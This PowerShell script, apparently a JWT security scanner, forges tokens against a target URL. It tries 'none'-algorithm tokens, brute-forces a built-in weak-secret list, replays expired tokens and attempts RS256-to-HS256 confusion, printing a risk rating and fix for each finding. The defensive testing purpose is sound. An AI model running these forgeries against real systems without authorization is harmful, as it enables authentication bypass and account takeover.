﻿# JWT Security Testing Script (PowerShell)
# Comprehensive testing for JSON Web Token vulnerabilities
# Covers: CWE-347, CWE-326, CWE-613
# Usage: .\jwt-security-test.ps1 -TargetUrl <URL> [-Mode <quick|full>]

param(
    [Parameter(Position=0)]
    [string]$TargetUrl,
    
    [Parameter(Position=1)]
    [ValidateSet("quick", "full")]
    [string]$Mode = "full",
    
    [switch]$CleanOutput,
    [switch]$Help,
    
    [string]$JwtEndpoint = "/api/auth",
    [string]$JwtHeader = "Authorization",
    [string]$ValidJwt = "",
    [string]$LoginEndpoint = "/login",
    [string]$UsernameField = "username",
    [string]$PasswordField = "password",
    [string]$ValidUsername = "admin",
    [string]$ValidPassword = "admin123"
)

# Common weak secrets
$WeakSecrets = @("secret", "password", "123456", "jwt_secret", "secret123", "key", "private", "jwt", "token", "auth", "admin", "test", "changeme", "supersecret", "mysecret", "secretkey", "your-256-bit-secret", "your-secret-key")

if ($Help) {
    Write-Host "[*] JWT SECURITY SCANNER" -ForegroundColor Magenta
    Write-Host "======================================================" -ForegroundColor Magenta
    Write-Host "Comprehensive security testing for JWT implementations`n" -ForegroundColor Blue
    
    Write-Host "USAGE:" -ForegroundColor Yellow
    Write-Host "  .\jwt-security-test.ps1 -TargetUrl <URL> [-Mode <quick|full>]`n"
    
    Write-Host "VULNERABILITY COVERAGE:" -ForegroundColor Yellow
    Write-Host "  • JWT None Algorithm (CWE-347)"
    Write-Host "  • JWT Weak Secret (CWE-326)"
    Write-Host "  • JWT Expired Token Accepted (CWE-613)"
    Write-Host "  • JWT Algorithm Confusion"
    Write-Host "  • JWT Key Injection`n"
    exit 0
}

if ([string]::IsNullOrEmpty($TargetUrl)) {
    Write-Host "[-] Error: Target URL is required" -ForegroundColor Red
    Write-Host "Usage: .\jwt-security-test.ps1 -TargetUrl <URL>" -ForegroundColor Blue
    exit 1
}

if ($TargetUrl -notmatch "^https?://") { $TargetUrl = "https://$TargetUrl" }
$TargetUrl = $TargetUrl.TrimEnd('/')

# Test tracking
$script:TestsPassed = 0
$script:TestsFailed = 0
$script:TestsTotal = 0
$script:HighRiskFindings = 0
$script:MediumRiskFindings = 0
$script:LowRiskFindings = 0
$script:HighRiskList = @()
$script:MediumRiskList = @()
$script:LowRiskList = @()
$script:ObtainedJwt = ""

function Write-Phase($msg) { Write-Host "`n$msg" -ForegroundColor Yellow }
function Write-Success($msg) { Write-Host "[+] PASS: $msg" -ForegroundColor Green }
function Write-Failure($msg) { Write-Host "[-] FAIL: $msg" -ForegroundColor Red }
function Write-Detail($msg) { Write-Host "   $msg" -ForegroundColor Cyan }

function Get-FindingDetails($type) {
    switch ($type) {
        "JWT-NONE" {
            Write-Host "[!] FOUND: JWT None Algorithm Vulnerability (CWE-347)" -ForegroundColor Red
            Write-Host "   RISK: Critical - Complete authentication bypass"
            Write-Host "   FIX: Explicitly reject 'none' algorithm"
        }
        "JWT-WEAK-SECRET" {
            Write-Host "[!] FOUND: JWT Weak Secret (CWE-326)" -ForegroundColor Red
            Write-Host "   RISK: High - Token signatures can be forged"
            Write-Host "   FIX: Use cryptographically strong random secret (256+ bits)"
        }
        "JWT-EXPIRED" {
            Write-Host "[!] FOUND: JWT Expired Token Accepted (CWE-613)" -ForegroundColor Red
            Write-Host "   RISK: Medium - Expired tokens remain valid"
            Write-Host "   FIX: Always validate exp claim"
        }
        "JWT-ALG-CONFUSION" {
            Write-Host "[!] FOUND: JWT Algorithm Confusion (CWE-347)" -ForegroundColor Red
            Write-Host "   RISK: Critical - Token forgery possible"
            Write-Host "   FIX: Validate algorithm matches expected"
        }
        "JWT-NO-EXPIRY" {
            Write-Host "[!] FOUND: JWT Without Expiration" -ForegroundColor Yellow
            Write-Host "   RISK: Medium - Tokens valid indefinitely"
            Write-Host "   FIX: Always include exp claim"
        }
    }
}

function ConvertTo-Base64Url($text) {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
    $base64 = [Convert]::ToBase64String($bytes)
    return $base64.Replace('+', '-').Replace('/', '_').TrimEnd('=')
}

function ConvertFrom-Base64Url($base64url) {
    $base64 = $base64url.Replace('-', '+').Replace('_', '/')
    switch ($base64.Length % 4) {
        2 { $base64 += '==' }
        3 { $base64 += '=' }
    }
    try {
        $bytes = [Convert]::FromBase64String($base64)
        return [System.Text.Encoding]::UTF8.GetString($bytes)
    } catch { return "" }
}

function Get-JwtPart($token, $part) {
    $parts = $token.Split('.')
    switch ($part) {
        "header" { return $parts[0] }
        "payload" { return $parts[1] }
        "signature" { return $parts[2] }
        "header_decoded" { return ConvertFrom-Base64Url $parts[0] }
        "payload_decoded" { return ConvertFrom-Base64Url $parts[1] }
    }
}

function New-Jwt($header, $payload, $secret = "", $alg = "HS256") {
    $headerB64 = ConvertTo-Base64Url $header
    $payloadB64 = ConvertTo-Base64Url $payload
    
    if ($alg -eq "none" -or [string]::IsNullOrEmpty($secret)) {
        return "$headerB64.$payloadB64."
    }
    
    $data = "$headerB64.$payloadB64"
    $secretBytes = [System.Text.Encoding]::UTF8.GetBytes($secret)
    $dataBytes = [System.Text.Encoding]::UTF8.GetBytes($data)
    
    $hmac = New-Object System.Security.Cryptography.HMACSHA256
    $hmac.Key = $secretBytes
    $hash = $hmac.ComputeHash($dataBytes)
    $signature = [Convert]::ToBase64String($hash).Replace('+', '-').Replace('/', '_').TrimEnd('=')
    
    return "$headerB64.$payloadB64.$signature"
}

function Get-JwtToken {
    if (-not [string]::IsNullOrEmpty($ValidJwt)) { return $ValidJwt }
    
    Write-Detail "Attempting to obtain JWT via login..."
    
    try {
        $body = @{ $UsernameField = $ValidUsername; $PasswordField = $ValidPassword } | ConvertTo-Json
        $response = Invoke-RestMethod -Uri "$TargetUrl$LoginEndpoint" -Method POST -Body $body -ContentType "application/json" -ErrorAction SilentlyContinue
        
        $jwt = $response.token
        if (-not $jwt) { $jwt = $response.access_token }
        if (-not $jwt) { $jwt = $response.jwt }
        if (-not $jwt) { $jwt = $response.accessToken }
        
        if ($jwt -match '^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$') {
            return $jwt
        }
    } catch {}
    
    return $null
}

function Test-JwtEndpoint($token) {
    $endpoints = @($JwtEndpoint, "/api/me", "/api/user", "/api/profile", "/me", "/user")
    
    foreach ($endpoint in $endpoints) {
        try {
            $headers = @{ $JwtHeader = "Bearer $token" }
            $response = Invoke-WebRequest -Uri "$TargetUrl$endpoint" -Headers $headers -UseBasicParsing -TimeoutSec 10 -ErrorAction SilentlyContinue
            
            if ($response.StatusCode -eq 200) {
                if ($response.Content -match '"(user|username|email|id|name)"') {
                    return $true
                }
            }
        } catch {}
    }
    return $false
}

function Test-JwtDetection {
    Write-Phase "[*] PHASE 1: JWT DETECTION AND ANALYSIS"
    
    $jwt = Get-JwtToken
    
    if ([string]::IsNullOrEmpty($jwt)) {
        Write-Host "[i] Could not obtain JWT token automatically" -ForegroundColor Gray
        return $false
    }
    
    Write-Host "[+] JWT obtained successfully" -ForegroundColor Green
    Write-Detail "Token: $($jwt.Substring(0, [Math]::Min(50, $jwt.Length)))..."
    
    $header = Get-JwtPart $jwt "header_decoded"
    $payload = Get-JwtPart $jwt "payload_decoded"
    
    Write-Host "`nJWT Header:" -ForegroundColor Cyan
    try { $header | ConvertFrom-Json | ConvertTo-Json } catch { $header }
    
    Write-Host "`nJWT Payload:" -ForegroundColor Cyan
    try { $payload | ConvertFrom-Json | ConvertTo-Json } catch { $payload }
    
    $script:TestsTotal++
    if ($payload -match '"exp"') {
        Write-Host "`n[+] PASS: JWT contains expiration (exp) claim" -ForegroundColor Green
        $script:TestsPassed++
    } else {
        Write-Failure "JWT missing expiration (exp) claim"
        Get-FindingDetails "JWT-NO-EXPIRY"
        $script:TestsFailed++
        $script:MediumRiskFindings++
        $script:MediumRiskList += "JWT Missing Expiration Claim"
    }
    
    $script:ObtainedJwt = $jwt
    return $true
}

function Test-NoneAlgorithm {
    Write-Phase "[X] PHASE 2: NONE ALGORITHM ATTACK"
    
    if ([string]::IsNullOrEmpty($script:ObtainedJwt)) {
        Write-Host "[i] Skipping - no valid JWT obtained" -ForegroundColor Gray
        return
    }
    
    $payload = Get-JwtPart $script:ObtainedJwt "payload_decoded"
    $noneVariants = @('{"alg":"none","typ":"JWT"}', '{"alg":"None","typ":"JWT"}', '{"alg":"NONE","typ":"JWT"}')
    
    $script:TestsTotal++
    $noneAccepted = $false
    
    foreach ($header in $noneVariants) {
        $forgedJwt = New-Jwt $header $payload "" "none"
        Write-Host "Testing: alg=$($header -replace '.*"alg":"([^"]+)".*', '$1')" -ForegroundColor Gray
        
        if (Test-JwtEndpoint $forgedJwt) {
            $noneAccepted = $true
            Write-Host "  [!] Token with none algorithm ACCEPTED!" -ForegroundColor Red
            break
        }
    }
    
    if ($noneAccepted) {
        Write-Failure "None algorithm vulnerability detected"
        Get-FindingDetails "JWT-NONE"
        $script:TestsFailed++
        $script:HighRiskFindings++
        $script:HighRiskList += "JWT None Algorithm Vulnerability"
    } else {
        Write-Success "None algorithm properly rejected"
        $script:TestsPassed++
    }
}

function Test-WeakSecret {
    Write-Phase "[*] PHASE 3: WEAK SECRET TESTING"
    
    if ([string]::IsNullOrEmpty($script:ObtainedJwt)) {
        Write-Host "[i] Skipping - no valid JWT obtained" -ForegroundColor Gray
        return
    }
    
    $header = Get-JwtPart $script:ObtainedJwt "header_decoded"
    $payload = Get-JwtPart $script:ObtainedJwt "payload_decoded"
    
    if ($header -notmatch '"alg":"HS(256|384|512)"') {
        Write-Host "[i] Algorithm is not HMAC-based - weak secret test limited" -ForegroundColor Gray
        return
    }
    
    Write-Detail "Testing $($WeakSecrets.Count) common weak secrets..."
    
    $script:TestsTotal++
    $weakFound = $false
    $foundSecret = ""
    
    foreach ($secret in $WeakSecrets) {
        $forgedJwt = New-Jwt $header $payload $secret "HS256"
        
        if (Test-JwtEndpoint $forgedJwt) {
            $weakFound = $true
            $foundSecret = $secret
            Write-Host "  [!] Weak secret found: '$secret'" -ForegroundColor Red
            break
        }
    }
    
    if ($weakFound) {
        Write-Failure "Weak JWT secret detected"
        Write-Host "   Secret: $foundSecret" -ForegroundColor Gray
        Get-FindingDetails "JWT-WEAK-SECRET"
        $script:TestsFailed++
        $script:HighRiskFindings++
        $script:HighRiskList += "JWT Weak Secret: '$foundSecret'"
    } else {
        Write-Success "No common weak secrets detected"
        $script:TestsPassed++
    }
}

function Test-ExpiredToken {
    Write-Phase "[*] PHASE 4: EXPIRED TOKEN TESTING"
    
    if ([string]::IsNullOrEmpty($script:ObtainedJwt)) {
        Write-Host "[i] Skipping - no valid JWT obtained" -ForegroundColor Gray
        return
    }
    
    $header = Get-JwtPart $script:ObtainedJwt "header_decoded"
    $payload = Get-JwtPart $script:ObtainedJwt "payload_decoded"
    
    $expiredTime = [int][double]::Parse((Get-Date -UFormat %s)) - 86400
    $expiredPayload = $payload -replace '"exp":\d+', "`"exp`":$expiredTime"
    
    Write-Detail "Creating token with exp: $expiredTime (expired)"
    
    $script:TestsTotal++
    $expiredAccepted = $false
    
    foreach ($secret in $WeakSecrets) {
        $expiredJwt = New-Jwt $header $expiredPayload $secret "HS256"
        
        if (Test-JwtEndpoint $expiredJwt) {
            $expiredAccepted = $true
            Write-Host "  [!] Expired token ACCEPTED!" -ForegroundColor Red
            break
        }
    }
    
    if ($expiredAccepted) {
        Write-Failure "Expired tokens are accepted"
        Get-FindingDetails "JWT-EXPIRED"
        $script:TestsFailed++
        $script:MediumRiskFindings++
        $script:MediumRiskList += "JWT Expired Token Accepted"
    } else {
        Write-Success "Expired tokens properly rejected (or unable to test)"
        $script:TestsPassed++
    }
}

function Test-AlgorithmConfusion {
    Write-Phase "[*] PHASE 5: ALGORITHM CONFUSION ATTACK"
    
    if ([string]::IsNullOrEmpty($script:ObtainedJwt)) {
        Write-Host "[i] Skipping - no valid JWT obtained" -ForegroundColor Gray
        return
    }
    
    $header = Get-JwtPart $script:ObtainedJwt "header_decoded"
    $payload = Get-JwtPart $script:ObtainedJwt "payload_decoded"
    
    $alg = if ($header -match '"alg":"([^"]+)"') { $matches[1] } else { "unknown" }
    Write-Detail "Current algorithm: $alg"
    
    $script:TestsTotal++
    $confusionDetected = $false
    
    if ($alg -match "^(RS|ES|PS)") {
        Write-Detail "Testing RS256 -> HS256 confusion..."
        $hsHeader = '{"alg":"HS256","typ":"JWT"}'
        $testSecrets = @("", "public", "publickey")
        
        foreach ($secret in $testSecrets) {
            $confusedJwt = New-Jwt $hsHeader $payload $secret "HS256"
            if (Test-JwtEndpoint $confusedJwt) {
                $confusionDetected = $true
                Write-Host "  [!] Algorithm confusion attack succeeded!" -ForegroundColor Red
                break
            }
        }
    }
    
    if ($confusionDetected) {
        Write-Failure "Algorithm confusion vulnerability detected"
        Get-FindingDetails "JWT-ALG-CONFUSION"
        $script:TestsFailed++
        $script:HighRiskFindings++
        $script:HighRiskList += "JWT Algorithm Confusion"
    } else {
        Write-Success "No algorithm confusion detected"
        $script:TestsPassed++
    }
}

function Show-Summary {
    Write-Host "`n======================================================" -ForegroundColor Magenta
    Write-Host " JWT SECURITY SCAN SUMMARY" -ForegroundColor Magenta
    Write-Host "======================================================" -ForegroundColor Magenta
    
    Write-Host "`nTarget: $TargetUrl" -ForegroundColor Blue
    Write-Host "Scan completed: $(Get-Date)`n" -ForegroundColor Blue
    
    $passRate = if ($script:TestsTotal -gt 0) { [Math]::Round(($script:TestsPassed / $script:TestsTotal) * 100) } else { 0 }
    
    Write-Host "Test Results:" -ForegroundColor Cyan
    Write-Host "  Total Tests: $($script:TestsTotal)"
    Write-Host "  Passed: $($script:TestsPassed)" -ForegroundColor Green
    Write-Host "  Failed: $($script:TestsFailed)" -ForegroundColor Red
    Write-Host "  Pass Rate: $passRate%`n"
    
    Write-Host "Risk Summary:" -ForegroundColor Cyan
    Write-Host "  High Risk: $($script:HighRiskFindings)" -ForegroundColor Red
    Write-Host "  Medium Risk: $($script:MediumRiskFindings)" -ForegroundColor Yellow
    Write-Host "  Low Risk: $($script:LowRiskFindings)`n" -ForegroundColor Blue
    
    if ($script:HighRiskList.Count -gt 0) {
        Write-Host "[!] HIGH RISK FINDINGS:" -ForegroundColor Red
        $script:HighRiskList | ForEach-Object { Write-Host "  • $_" -ForegroundColor Red }
        Write-Host ""
    }
    
    if ($script:MediumRiskList.Count -gt 0) {
        Write-Host "[!] MEDIUM RISK FINDINGS:" -ForegroundColor Yellow
        $script:MediumRiskList | ForEach-Object { Write-Host "  • $_" -ForegroundColor Yellow }
        Write-Host ""
    }
    
    $score = 100 - ($script:HighRiskFindings * 25) - ($script:MediumRiskFindings * 15) - ($script:LowRiskFindings * 5)
    if ($score -lt 0) { $score = 0 }
    
    Write-Host "Overall JWT Security Score:" -ForegroundColor Cyan
    if ($score -ge 80) { Write-Host "  $score/100 - GOOD" -ForegroundColor Green }
    elseif ($score -ge 60) { Write-Host "  $score/100 - NEEDS IMPROVEMENT" -ForegroundColor Yellow }
    else { Write-Host "  $score/100 - CRITICAL" -ForegroundColor Red }
    
    Write-Host "`n======================================================" -ForegroundColor Magenta
}

# Main
Write-Host "[*] JWT SECURITY SCANNER" -ForegroundColor Magenta
Write-Host "======================================================" -ForegroundColor Magenta
Write-Host "Target: $TargetUrl" -ForegroundColor Blue
Write-Host "Mode: $Mode" -ForegroundColor Blue
Write-Host "Timestamp: $(Get-Date)`n" -ForegroundColor Blue

$hasJwt = Test-JwtDetection

if ($hasJwt) {
    Test-NoneAlgorithm
    Test-WeakSecret
    
    if ($Mode -eq "full") {
        Test-ExpiredToken
        Test-AlgorithmConfusion
    }
}

Show-Summary
